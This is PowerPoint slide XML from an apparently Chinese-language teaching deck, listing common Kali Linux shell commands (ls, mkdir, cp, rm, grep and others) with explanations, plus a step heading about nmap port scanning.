      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Kali Linux常用命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875655" y="182880"/>
            <a:ext cx="5828030" cy="6247130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>基本命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ls	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示文件或目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-l	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>列出文件详细信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 1(list)-a	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>列出当前目录下所有文件及目录，包括隐藏的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>a(all)mkdir	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-p	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建目录，若无父目录，则创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>p(parent)cd	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>切换目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>touch	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建空文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>echo	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建带有内容的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cat	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cp	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>mv	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>移动或重命名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rm	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>删除文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-r	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>递归删除，可删除子目录及文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-f	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>强制删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>find	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在文件系统中搜索某文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>wc	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>统计文本中行数、字数、字符数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>grep	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在文本文件中查找某个字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rmdir	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>删除空目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tree	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>树形结构显示目录，需要安装tree包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pwd	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示当前目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ln	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建链接文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1600" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="306070"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>more、less	分页显示文本文件内容head、tail	显示文件头、尾内容Ctrl+Alt+F1	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令行全屏模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行IP协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
